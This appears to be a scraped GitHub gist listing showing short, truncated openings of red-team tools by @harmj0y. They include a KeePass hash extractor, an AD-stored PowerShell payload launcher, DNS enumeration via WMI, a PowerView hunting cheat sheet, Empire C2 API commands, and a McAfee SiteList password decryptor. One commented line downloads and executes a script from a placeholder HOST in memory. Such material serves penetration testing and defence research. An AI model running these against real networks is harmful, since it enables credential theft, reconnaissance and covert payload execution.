This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# Python port of keepass2john from the John the Ripper suite (http://www.openwall.com/john/) | |
# ./keepass2john.c was written by Dhiru Kholia <dhiru.kholia at gmail.com> in March of 2012 | |
# ./keepass2john.c was released under the GNU General Public License | |
# source keepass2john.c source code from: http://fossies.org/linux/john/src/keepass2john.c | |
# | |
# Python port by @harmj0y, GNU General Public License | |
# |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function ConvertTo-Rc4ByteStream { | |
<# | |
.SYNOPSIS | |
Converts an input byte array to a RC4 cipher stream using the specified key. | |
Author: @harmj0y | |
License: BSD 3-Clause | |
Required Dependencies: None | |
Optional Dependencies: None |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Requires -Version 2 | |
function New-ADPayload { | |
<# | |
.SYNOPSIS | |
Stores PowerShell logic in the mSMQSignCertificates of the specified -TriggerAccount and generates | |
a one-line launcher. | |
Author: @harmj0y |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Show remote branches: | |
git branch -v -a | |
To check out the remote branch: | |
http://stackoverflow.com/questions/1783405/checkout-remote-git-branch | |
git fetch | |
git checkout <branch> | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Get all zones: | |
Get-WmiObject MicrosoftDNS_Zone -Namespace Root\MicrosoftDNS -ComputerName primary.testlab.local | Select ContainerName | |
Get all A records from a zone: | |
Get-WmiObject -Namespace Root\MicrosoftDNS -Query "SELECT * FROM MicrosoftDNS_ResourceRecord WHERE ContainerName='testlab.local'" -ComputerName primary.testlab.local | ?{$_.TextRepresentation -match " A "} | Select -Expand TextRepresentation | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Import PowerView into memory without touching disk | |
# IEX (New-Object Net.WebClient).DownloadString('http://HOST/powerview.ps1') | |
################################### | |
# Hunting for Users | |
################################### | |
# search for administrator groups |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$GroupData = @{} | |
$UserData = @{} | |
$ServerData = @{} | |
Import-CSV .\DomainGroups.csv | ForEach-Object { | |
if($GroupData[$_.GroupName]) { | |
$_.GroupName = $GroupData[$_.GroupName] | |
} | |
else { | |
$guid = ([guid]::NewGuid()).Guid |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# start empire headless with the specified API username and password | |
./empire --headless --username empireadmin --password 'Password123!' | |
# login and the current server token | |
curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/admin/login -X POST -d '{"username":"empireadmin", "password":"Password123!"}' | |
# store the token in a variable | |
TOKEN=<API_token> | |
# see listener options |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Function Start-FileSystemMonitor { | |
<# | |
.SYNOPSIS | |
This function will monitor one or more file paths for any file | |
creation, deletion, modification, or renaming events. Data including | |
the change type, ACL for the file, etc. is output to the screen or | |
a specified -LogFile. | |
If -InjectShellCmd is specified, the given command is inserted into |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Get-DecryptedSitelistPassword { | |
# PowerShell adaptation of https://github.com/funoverip/mcafee-sitelist-pwd-decryption/ | |
# Original Author: Jerome Nokin (@funoverip / jerome.nokin@gmail.com) | |
# port by @harmj0y | |
[CmdletBinding()] | |
Param ( | |
[Parameter(Mandatory = $True)] | |
[String] | |
$B64Pass | |
) |